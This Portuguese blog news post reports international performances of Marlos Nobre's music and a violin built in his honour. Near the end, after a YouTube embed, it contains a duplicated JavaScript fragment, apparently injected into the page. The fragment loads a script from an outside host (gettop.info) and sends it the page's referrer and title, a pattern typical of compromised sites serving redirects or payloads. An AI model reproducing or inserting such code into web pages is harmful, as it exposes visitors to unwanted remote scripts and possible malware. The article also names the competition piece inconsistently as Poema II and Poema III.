LateralNotícia

Marlos Nobre continua caminhada internacional

O nosso compositor Marlos Nobre continua com suas obras sendo executadas pelo mundo afora. Veja as notícias…

POEMA III de Marlos Nobre é peça de confronto no SPHINX STRINGS COMPETITION

Gabriel Cabezas

O Poema II para violoncelo e piano de Marlos Nobre foi a peça obrigatória de confronto, imposta a todos os concorrentes na categoria “senior division” de violoncelo, nas provas preliminares e nas provas semifinais no “15th Annual SPHINX Competition 2012”, realizado de 8 a 12 de fevereiro 2012, como já é tradição anualmente, em Ann Arbor d Detroit Michigan, USA.

A competição é aberta a jovens executantes de instrumentos de cordas, residentes nos Estados Unidos, provenientes das intituladas “Junior High”, “High School” e “College”, os quais têm a chance de competirem pelo prêmio máximo diante de um quadro de jurados internacionais altamente qualificados. Os premiados são imediatamente chamados a tocarem em recitais com outros músicos de sólida carreira profissional nos Estados Unidos.

O Concurso SPHINX já em sua 15ª edição foi realizado em 2012 com o patrocínio da DTE Energy Foundation com o suporte adicional da Pickard Family Fund.

O vencedor do concursos 2012 acaba de ser anunciado após a prova final realizada em 12 de fevereiro passado no Hill Auditorium em Ann Arbor, Michigan: trata-se do jovem violoncelista Gabriel Cabezas, classificado “First Place Senior Division” e que fez primorosas versões da peça de confronto, o POEMA III para violoncelo e piano de Marlos Nobre tanto na fase preliminar como na semifinal.

O jovem vencedor ganhou, além do 1º Prêmio, o Prêmio do Público (Audience Choice Award) patrocinado pela Mercedes Benz Financial Services.

O POEMA III para violoncelo e piano de MARLOS NOBRE foi tocado 35 vezes pelos jovens concorrentes nas provas preliminares e semifinais do SPHINX competition.

 

Violino Marlos Nobre

Violino Marlos Nobre

Outra importante notícia sobre o nosso compositor Marlos Nobre é o mais novo violino construído pelo grande luthier Dantas Barreto, em homenagem ao compositor, e cuja data de construção é 2011 portanto o mais recente criado por esta luteria de altíssimo nível.


Diplomado no Instituto Internacional de Luteria A. Stradivari, de Cremona, em 1992, onde estudou com os Mestres Giorgio Cè (luteria) e Piero Ferraroni (escultura) e Bacharel em Música com habilitação em violino pela Universidade Federal da Paraíba, Saulo Dantas-Barreto vem desenvolvendo, desde então, um trabalho de qualidade reconhecido internacionalmente. 

Na Europa (Itália e Espanha), onde viveu por doze anos, encontram-se alguns instrumentos de sua autoria, tais como: o “Quarteto da Rainha”, construído para a Casa Real Espanhola, que integra a coleção de instrumentos musicais do Palácio Real de Madri; a reprodução da “Arpa Stradivariana” (1681), para o Estado Italiano, em exposição permanente no Instituto de Luteria de Cremona; o “Quarteto Rio Branco” para a “Triennale di Cremona” (out/2000); o “Violino Cavalcabò”, para os Marqueses de Cremona.

Seu trabalho conta com o apoio do Governo do Brasil (CNPq), Instituto Ítalo-Latino Americano (Roma – Itália), Fundação Walter Stauffer (Cremona – Itália) e da Família Imperial do Brasil.

Lutiê oficial do 41º Festival de Inverno de Campos do Jordão, é responsável pela manutenção do instrumental de cordas da Santa Marcelina Cultura.

Em julho de 2010, foi lançado pela Editora Alaúde o livro “Aleijadinho O Violoncelo” (texto de Marcia Glogowski – www.alaude.com.br) que mostra toda a construção desse instrumento temático.

Atualmente trabalha em São Paulo (Brasil), dedicando-se à construção e à restauração de instrumentos.

 

“Convergências”, pela Orquestra Sinfônica de Xalapa

Ainda, em se falando de Marlos Nobre, o concerto inaugural da temporada 2012 da Orquestra Sinfônica de Xalapa, México, uma das mais prestigiosas e antigas orquestras do México, apresentou a obra CONVERGÊNCIAS para orquestra, do nosso compositor, no dia 27 de janeiro passado no grande Teatro del Estado de Xalapa. O regente foi o novo contratado da orquestra como diretor titular, o Maestro Lanfranco Marcelletti, que fazia sua estreia como responsável pela programação do conjunto nas próximas temporadas.

Lanfranco Marcelletti foi aluno do nosso grande maestro Eleazar de Carvalho na Yale University nos Estados Unidos, tendo se destacado como uma das grandes promessas da regência na atualidade sobretudo nos Estados Unidos e Europa.

A obra Convergências, de Marlos Nobre,  foi escrita em 1977 por encomenda do 1º Festival de Música Contemporânea de Maracaibo, Venezuela,  no qual foi estreado pela Orquestra Sinfônica de Maracaibo, dirigida por seu titular Eduardo Rahn. Imediatamente, a obra tornou-se uma das mais requisitadas obras sinfônicas do compositor, tendo sido gravada comercialmente em três ocasiões nos importantes selos CD DELOS USA (Symphony Orchestra of Paraíba, conductor Eleazar de Carvalho); CD DORIAN USA (Simon Bolívar Symphony Orchestra, conducted by Kerin Lynn  Wilson); CD LEMAN CLASSICS, Switzerland (Musica Nova Philharmonia, conducted by Marlos Nobre).

 

Convergências, pela Simon Bolívar Symphony, Kerin Lynn Wilson

 

[youtube]http://www.youtube.com/watch?v=Xlvho4tWU8o[/youtube]

 



s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.